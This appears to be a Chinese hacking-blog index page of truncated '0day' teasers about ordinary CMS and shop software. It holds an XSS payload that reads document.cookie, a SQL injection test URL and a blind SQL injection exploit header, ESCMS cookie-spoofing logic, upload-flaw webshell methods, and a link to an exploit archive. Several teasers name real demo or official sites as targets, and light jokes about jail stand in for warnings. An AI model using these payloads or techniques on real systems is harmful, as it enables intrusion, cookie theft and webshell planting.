sina邮箱首先，我们去申请一个sina的免费邮箱。这里我们的测试方式是用自己的邮箱给自己的发邮件。 “><img src=”http://xss.jpg” onerror=alert(document.cookie)> ...

漏洞发现者：闷豆 <?php print_r(‘ +—————————————————————————+ 9959网店系统 v5.0 Blind SQL injection exploit by...

漏洞文件：UpFileForm.asp <html> <head> <meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″> <link rel=”stylesheet” href=”Images/CssAdmin.css”> <title>文件选择</title> </head> <body style=”background-color:#FFFFFF;”> <table width=”400″ border=”0″ align=”center” cellpadding=”12″ cellspacing=”1″...

建站之星SiteStar V2.0 漏洞由大牛云集的t00ls会员“Odays村长”发现并公布。 建站之星的V1.3版本前一段时间才被爆出一个fckeditor的上传漏洞，现在又被t00ls的牛爆出一个漏洞。 上图： 这次建站之星SiteStar...

白银时代备注：来源于t00ls，无意间黑盒发现dircms存在宽字节带来的注入问题，虽然流行过一段时间，貌似现在人们都不太关注这个问题。测试了下发现有俩个地方存在问题： 1.http://demo.dircms.net/lifecms/s … mp;xs=&wylx=%BF    ...

PHPCMS是一款基于 PHP+Mysql 架构的网站内容管理系统，也是一个开源的 PHP 开发平台。Phpcms 采用模块化方式开发，功能易用便于扩展，可面向大中型站点提供重量级网站建设解决方案。 在文件incude/common.inc.php中： if(!defined(‘IN_ADMIN’)) //不是管理员则进入判断 { if($CONFIG['dbiscache']) $db_file .= ‘_cache’; if($CONFIG['phpcache'] ==...

...

...

http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC# goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filte r_attr=-999 Test it : http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC% 23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&fil ter_attr=-999%20OR%20length(session_user())=14%20or%201=2...

作者:Lan3a 第一： 管理员目录下的Admin_Passod.asp <!–#include file=”../Include/conn.asp”–> <!–#include file=”../Include/md5.asp”–> <% select case request.QueryString(“Action”) case “ModifyPass” SaveNewPass case else end select set rs = server.createobject(“adodb.recordset”) sql=”select * from Lelv_w_manage order by id desc” rs.open...

ESCMS cookies欺骗0day 版本:ESCMS V1.0 SP1 Build 1125 后台登陆验证是通过admin/check.asp实现的,看代码 <% if Request.cookies(CookiesKey)(“ES_admin”)=”" then ”注意这里哦,他是通过COOKIE验证ES_admin是否为空,我们可以伪造一个值,叫他不为空 ”CookiesKey在inc/ESCMS_Config.asp文件中,默认为ESCMS$_SP2 Call Err_Show() Response.End() End...

作者：熙　雅′blog www.xiya.org 白大王友情提醒：写个博客不容易，不要拿去做啥坏事。 此程序Fckeditor在根目录,可能成功的几率比较大,祝大家好运…. 下载地址：http://www.xiya.org/exp/X-Blog_exp.rar...

来源：http://www.t00ls.net/thread-5608-1-1.html 白大王友情提示：非法入侵会被喊过去吃窝窝头，玩躲猫猫。 文/My5t3ry 昨天看到论坛上有朋友问CitySHOP后台如何拿SHELL，就下了源码回来读了下，发现代码用zend加密了。 解密后读了下，漏洞还真不少，很多参数都是$_GET后就直接带入sql查询，如： 上面的代码这句$chknum = $conn->query( “SELECT goodshit...

同样来源于：http://yxmhero1989.blog.163.com/，大家小心点，已经说过很多次了，反正本大王不想吃窝窝头，玩躲猫猫。 Author:Minghacker From：www.3est.com Blog:http://yxmhero1989.blog.163.com 貌似有新旧版本。 看代码sub_uploadb.asp <%@language=VBScript%> <!–#include FILE=”upload.inc”–> <% dim upload,file,formName,formPath,iCount,fileformat set upload=new...

白大王友情提示：非法入侵网站会遭遇躲猫猫和吃窝窝头，大家自重。 第一种方法： 先注册个用户然后把 <form method=”post” action=”   http://www.xxx.com/bbs/misc.php” enctype=”multipart/form-data”> 帖子ID，指定一个存在的帖子即可：<input type=”text” name=”tid” value=”1″ /> <input type=”hidden” name=”action” value=”imme_binding”...

漏洞原因：IIS6.0解析漏洞，Upload_user.aspx可以选择不对上传文件重命名，导致漏洞产生。（希望有此漏洞的朋友赶紧修补） 暗链代码参考此文：一切为了暗链，菜鸟跟我一起来ASP手工注入 演示开始： 目标站点，风讯官方演示站...

...

        剩蛋快乐……大家一起乐吧。

很垃圾的！
无聊看了下，ShopWind
很多注入点的，还有 cookie欺骗等等！
相信很多人都发现了这个注入，只是没发出来而已。

在news.asp里发现了，id这个变量没过滤，没做任何防范措施。

item_news.asp里定义了变量id文件如下：
...

话说这个漏洞可是个重磅炸弹，前几天NOD32杀软官方被黑，还有微软在其他几个国家的分站被黑，都是因为FCK漏洞被黑的。只是大家没有重视。要死一大片网站咯。貌似Zblog也是使用的fckeditor，呵呵。 相关文章： PHPMPS 0day 网址加上...

剩蛋大礼，虽然很多网站已经在转载了，本大王还是贴出来大家看看吧。 Author:Minghacker From:http://www.3est.com Blog: http://yxmhero1989.blog.163.com PHPMPS ,主站http://www.phpmps.com/有下载。v2.0正式版GBK 和...